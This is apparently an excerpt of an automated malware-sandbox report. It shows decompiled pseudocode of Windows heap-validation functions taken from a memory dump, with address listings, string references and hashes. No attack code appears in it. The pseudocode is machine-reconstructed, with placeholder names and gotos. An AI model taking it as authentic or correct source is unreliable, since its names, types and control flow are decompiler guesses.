								_t101 = _t415 + 8; // -16
								E00B3A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E00A9E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E00B3A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E00A9E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E00A9A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E00A9A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E00A9BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E00B223E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E00A71F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}

0x00b34af7
0x00b34afb
0x00b34afd
0x00b34b01
0x00b34b03
0x00b34b08
0x00b34b0a
0x00b34b0f
0x00b34eb5
0x00b34eb5
0x00b34ebb
0x00b350d5
0x00b350d8
0x00b34ff6
0x00000000
0x00b34ff6
0x00b350de
0x00b350e4
0x00b350e8
0x00b35107
0x00b3510c
0x00b350ea
0x00b350ff
0x00b35104
0x00b35112
0x00b35115
0x00b35118
0x00b35119
0x00b350cb
0x00b350cb
0x00b350af
0x00000000
0x00b350af
0x00b34ecb
0x00b350b6
0x00b350bb
0x00b34ed1
0x00b34ee6
0x00b34eeb
0x00b350c1
0x00b350c2
0x00b350c5
0x00b350c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00b34b15
0x00b34b15
0x00b34b1c
0x00b34b1e
0x00b34b23
0x00b34b27
0x00b34b33
0x00b34b38
0x00b34b3a
0x00b34b3c
0x00b34b41
0x00b34b41
0x00b34b3a
0x00b34b52
0x00b35045
0x00b3504b
0x00b3504f
0x00b3506e
0x00b35073
0x00b35051
0x00b35066
0x00b3506b
0x00b35083
0x00b35088
0x00b35088
0x00b3508a
0x00b35091
0x00b35099
0x00b35099
0x00b3509d
0x00b350a7
0x00b350ad
0x00b350ad
0x00b350ad
0x00000000
0x00b3509d
0x00b34b58
0x00b34b5b
0x00b34b5e
0x00b34b63
0x00b34b66
0x00b34b69
0x00b34b6f
0x00b34be4
0x00b34bf0
0x00b34bf2
0x00b34bf5
0x00b34dc3
0x00b34dc6
0x00b34dc9
0x00b34dce
0x00b34dce
0x00b34dd0
0x00b34dd0
0x00b34dd5
0x00b34def
0x00b34dd7
0x00b34de7
0x00b34de7
0x00b34df3
0x00b35001
0x00b35007
0x00b3500b
0x00b3502a
0x00b3502f
0x00b3500d
0x00b35022
0x00b35027
0x00b35039
0x00b3503a
0x00b3503b
0x00000000
0x00b34df9
0x00b34dfd
0x00b34e90
0x00b34e94
0x00b34e9e
0x00b34ea4
0x00b34ea4
0x00b34ea4
0x00b34ea6
0x00b34ea6
0x00000000
0x00b34ea6
0x00b34e03
0x00b34e08
0x00b34f88
0x00b34f92
0x00b34f99
0x00b34f9c
0x00b34fe0
0x00b34fe4
0x00b34fee
0x00b34ff4
0x00b34ff4
0x00b34ff4
0x00000000
0x00b34fe4
0x00b34f9e
0x00b34fa4
0x00b34fa8
0x00b34fc7
0x00b34fcc
0x00b34faa
0x00b34fbf
0x00b34fc4
0x00b34fd2
0x00b34fd5
0x00b34fd6
0x00b34f34
0x00b34f34
0x00000000
0x00b34f39
0x00b34e0e
0x00b34e14
0x00b34e1b
0x00b34e25
0x00b34e2b
0x00b34e2b
0x00b34e33
0x00b34e38
0x00b34e8a
0x00b34e8a
0x00000000
0x00b34e3a
0x00b34e3e
0x00b34e43
0x00b34e47
0x00b34e53
0x00b34e58
0x00b34e5a
0x00b34e5c
0x00b34e61
0x00b34e61
0x00b34e5a
0x00b34e6e
0x00b34f41
0x00b34f47
0x00b34f4b
0x00b34f6a
0x00b34f6f
0x00b34f4d
0x00b34f62
0x00b34f67
0x00b34f7f
0x00b34f80
0x00b34f81
0x00000000
0x00b34e74
0x00b34e78
0x00b34e82
0x00b34e88
0x00b34e88
0x00000000
0x00b34e78
0x00b34e6e
0x00b34e38
0x00b34df3
0x00b34bfe
0x00b34c01
0x00b34c04
0x00b34c07
0x00b34c09
0x00b34c0c
0x00b34c0e
0x00b34c0e
0x00b34c11
0x00b34c11
0x00b34c0c
0x00b34c14
0x00b34c17
0x00b34dae
0x00b34db2
0x00b34db7
0x00b34dba
0x00b34dbd
0x00b34ef1
0x00b34ef7
0x00b34efb
0x00b34f1a
0x00b34f1f
0x00b34efd
0x00b34f12
0x00b34f17
0x00b34f2b
0x00b34f2b
0x00b34f2d
0x00b34f2e
0x00b34f2f
0x00000000
0x00b34f2f
0x00000000
0x00b34c1d
0x00b34c1d
0x00b34c20
0x00b34c23
0x00b34c26
0x00b34c29
0x00b34c2c
0x00b34c2e
0x00b34d91
0x00b34d91
0x00b34d92
0x00b34d97
0x00b34d9e
0x00000000
0x00b34d9e
0x00b34c34
0x00b34c37
0x00b34c39
0x00b34c3c
0x00000000
0x00000000
0x00b34c45
0x00b34c48
0x00b34c4e
0x00b34c50
0x00b34c78
0x00b34c78
0x00b34c7b
0x00b34c7d
0x00b34c80
0x00b34c84
0x00b34cad
0x00b34cad
0x00b34cb0
0x00b34cb8
0x00b34cbb
0x00b34cbe
0x00b34cc1
0x00b34cc7
0x00b34cdc
0x00b34cc9
0x00b34cd2
0x00b34cd4
0x00b34cd4
0x00b34cde
0x00b34ce0
0x00b34d13
0x00b34d13
0x00b34d16
0x00b34d18
0x00b34d29
0x00b34d2a
0x00b34d2c
0x00b34d34
0x00b34d1a
0x00b34d1a
0x00b34d1a
0x00b34d1d
0x00b34d1f
0x00b34d22
0x00b34d24
0x00b34d24
0x00b34d3c
0x00b34d3f
0x00b34d45
0x00b34d47
0x00b34d6c
0x00b34d6c
0x00b34d70
0x00b34d7e
0x00b34d84
0x00b34d84
0x00000000
0x00b34d49
0x00b34d49
0x00b34d56
0x00b34d56
0x00b34d59
0x00000000
0x00000000
0x00b34d4e
0x00b34d50
0x00b34d52
0x00b34d8e
0x00b34d5d
0x00b34d5f
0x00b34d67
0x00000000
0x00b34d67
0x00b34d54
0x00b34d54
0x00b34d5b
0x00000000
0x00b34d5b
0x00b34ce2
0x00b34ce2
0x00b34ce5
0x00b34ce5
0x00b34ce7
0x00b34cfb
0x00b34ce9
0x00b34ce9
0x00b34cec
0x00b34cef
0x00b34cf1
0x00b34cf3
0x00b34cf3
0x00b34cf3
0x00b34cf6
0x00b34cf6
0x00b34d02
0x00b34d05
0x00000000
0x00000000
0x00b34d07
0x00b34d0f
0x00b34d11
0x00000000
0x00000000
0x00000000
0x00b34d11
0x00000000
0x00b34ce5
0x00b34ce0
0x00b34c8a
0x00b34c8f
0x00b34c91
0x00000000
0x00000000
0x00b34c9d
0x00000000
0x00b34c9d
0x00b34c52
0x00b34c5f
0x00b34c5f
0x00b34c62
0x00000000
0x00000000
0x00b34c57
0x00b34c59
0x00b34c5b
0x00b34caa
0x00b34c66
0x00b34c68
0x00b34c70
0x00b34c75
0x00000000
0x00b34c75
0x00b34c5d
0x00b34c5d
0x00b34c64
0x00000000
0x00b34c64
0x00b34c17
0x00b34b75
0x00b34bc4
0x00b34bc8
0x00000000
0x00000000
0x00b34bd9
0x00000000
0x00000000
0x00000000
0x00b34b77
0x00b34b7a
0x00b34b8c
0x00b34b7c
0x00b34b7e
0x00b34b83
0x00b34b86
0x00b34b86
0x00b34b90
0x00b34b93
0x00000000
0x00000000
0x00b34b95
0x00b34bab
0x00b34bb0
0x00000000
0x00000000
0x00b34bb2
0x00b34bb9
0x00000000
0x00000000
0x00b34bbb
0x00b34bbe
0x00b34bc1
0x00b34bc1
0x00000000
0x00b34bc1
0x00b34b97
0x00b34ba4
0x00000000
0x00000000
0x00b34ba6
0x00000000
0x00b34ba6
0x00b34ea9
0x00b34ea9
0x00b34eb2
0x00000000

Strings

HEAP: , xrefs: 00B34F1A, 00B34F6A, 00B34FC7, 00B3502A, 00B3506E, 00B350B6, 00B35107
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 00B350C6
HEAP[%wZ]: , xrefs: 00B34EE1, 00B34F0D, 00B34F5D, 00B34FBA, 00B3501D, 00B35061, 00B350FA
Heap block at %p has incorrect segment offset (%x), xrefs: 00B3503B
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 00B34F81
Free Heap block %p modified at %p after it was freed, xrefs: 00B34F2F
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 00B35119
Heap block at %p is not last block in segment (%p), xrefs: 00B34FD6
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 00B3508C

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 26ed28c3ed97c2074472befdba2372cda9feaec2ab9e84c3324bd0ceea7b005e
Instruction ID: 484aeaebbee7165463ca3cda556a692158f4c462d9a3e6abf15a32a019c03d28
Opcode Fuzzy Hash: 26ed28c3ed97c2074472befdba2372cda9feaec2ab9e84c3324bd0ceea7b005e
Instruction Fuzzy Hash: 4712B074210641AFDB29CF68C495BB6B7F1FF48704F6485A9E48A8B681D735FC84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B34496, Relevance: 10.4, Strings: 8, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E00B34496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E00B349A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0xb66378 = _t267;
						asm("int3");
						 *0xb66378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E00AA174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E00A7B150();
							} else {
								E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E00A7B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E00A7B150();
							} else {
								E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E00A7B150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0xb66350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E00AB9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E00AA174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E00A7B150();
										} else {
											E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E00A7B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E00A7B150();
									} else {
										E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E00A7B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E00A7B150();
								} else {
									E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E00A7B150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E00A7B150();
							} else {
								E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E00B34AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E00B2FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E00B223E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}

0x00b344a1
0x00b344a3
0x00b344a7
0x00b344ac
0x00b344af
0x00b344b2
0x00b344b9
0x00b344bc
0x00b347f2
0x00b347f2
0x00b347f8
0x00b347fc
0x00b347fe
0x00b34804
0x00b34805
0x00b34805
0x00b3480c
0x00b34810
0x00b34812
0x00b34812
0x00b34812
0x00b34822
0x00b34822
0x00b34827
0x00b34827
0x00000000
0x00b34827
0x00b344c4
0x00b344d3
0x00b344d9
0x00b344dc
0x00b344de
0x00b344e0
0x00b34560
0x00b34520
0x00b34522
0x00b34525
0x00b34528
0x00b3452b
0x00b3452e
0x00b34530
0x00b34697
0x00b3469d
0x00b346a1
0x00b346c0
0x00b346c5
0x00b346a3
0x00b346b8
0x00b346bd
0x00b346cb
0x00b346d4
0x00b34677
0x00b34677
0x00b34679
0x00b3467c
0x00b3468a
0x00b34690
0x00b34690
0x00b347f1
0x00b347f1
0x00b347f1
0x00000000
0x00b347f1
0x00b34536
0x00b34539
0x00b3453c
0x00b34636
0x00b3463c
0x00b34640
0x00b3465f
0x00b34664
0x00b34642
0x00b34657
0x00b3465c
0x00b34670
0x00000000
0x00b34542
0x00b34542
0x00b34546
0x00b34548
0x00b3454b
0x00b34555
0x00b3455b
0x00b3455b
0x00b3455b
0x00b3455d
0x00b3455d
0x00b3455d
0x00000000
0x00b3455d
0x00b3453c
0x00b34579
0x00b3457c
0x00b34587
0x00b34589
0x00b34591
0x00b34592
0x00b34597
0x00b34598
0x00b345a1
0x00b345ab
0x00b345ab
0x00b345a1
0x00b345ae
0x00b345b4
0x00b345b9
0x00b345bd
0x00b34759
0x00b34759
0x00b3475f
0x00b34761
0x00b34763
0x00b34765
0x00b34768
0x00b3476b
0x00b3476d
0x00b3479c
0x00b3479c
0x00b3479f
0x00b347a2
0x00b347a4
0x00b34830
0x00b34833
0x00b34879
0x00b3487d
0x00b348f1
0x00b348f3
0x00b348f3
0x00000000
0x00b348f3
0x00b3487f
0x00b34885
0x00b34887
0x00b348a8
0x00b348a8
0x00b348ae
0x00b348b0
0x00b348dc
0x00b348dc
0x00b348dc
0x00b348dc
0x00b348ec
0x00000000
0x00b348ec
0x00b348b2
0x00b348bc
0x00b348be
0x00b348c1
0x00000000
0x00000000
0x00000000
0x00000000
0x00b348c3
0x00b348c3
0x00b348c6
0x00b348c9
0x00b348cc
0x00b348d1
0x00b348d4
0x00000000
0x00000000
0x00b348d6
0x00b348d7
0x00b348da
0x00000000
0x00000000
0x00000000
0x00b348da
0x00b3494f
0x00b34955
0x00b34959
0x00b34978
0x00b3497d
0x00b3495b
0x00b34970
0x00b34975
0x00b34986
0x00b34987
0x00b3498a
0x00b3498d
0x00b34997
0x00b347ef
0x00b347ef
0x00b347ef
0x00000000
0x00b347ef
0x00b34890
0x00b34890
0x00b34891
0x00b34891
0x00b34894
0x00b34897
0x00b3489d
0x00b348a0
0x00000000
0x00000000
0x00b348a2
0x00b348a3
0x00b348a6
0x00000000
0x00000000
0x00000000
0x00b348a6
0x00b348fb
0x00b34901
0x00b34905
0x00b34924
0x00b34929
0x00b34907
0x00b3491c
0x00b34921
0x00b3492f
0x00b34935
0x00b34936
0x00b34939
0x00b34942
0x00000000
0x00b34947
0x00b34835
0x00b3483b
0x00b3483f
0x00b3485e
0x00b34863
0x00b34841
0x00b34856
0x00b3485b
0x00b34869
0x00b3486c
0x00b3486f
0x00b347e7
0x00b347e7
0x00000000
0x00b347ec
0x00b347aa
0x00b347b0
0x00b347b4
0x00b347d3
0x00b347d8
0x00b347b6
0x00b347cb
0x00b347d0
0x00b347de
0x00b347df
0x00b347e2
0x00000000
0x00000000
0x00000000
0x00000000
0x00b3476f
0x00b3476f
0x00b34778
0x00b34785
0x00b34787
0x00b3478c
0x00b3478e
0x00000000
0x00000000
0x00b34790
0x00b34792
0x00b34794
0x00000000
0x00000000
0x00b34796
0x00b34799
0x00000000
0x00b34799
0x00000000
0x00b345c3
0x00b345c3
0x00b345c7
0x00b345c7
0x00b345ca
0x00b345cf
0x00b345d3
0x00b345df
0x00b345e4
0x00b345e6
0x00b345e8
0x00b345ed
0x00b345ed
0x00b345f2
0x00b345f2
0x00b345f7
0x00b345fc
0x00b34602
0x00b34606
0x00b34609
0x00b3460f
0x00b346de
0x00b346e3
0x00b346e5
0x00b346ec
0x00b346ee
0x00b346f6
0x00b346f6
0x00b346f6
0x00b346f6
0x00b346ec
0x00b34615
0x00b34615
0x00b3461d
0x00b3462e
0x00b3462e
0x00b3461d
0x00b3460f
0x00b34609
0x00b346fd
0x00000000
0x00000000
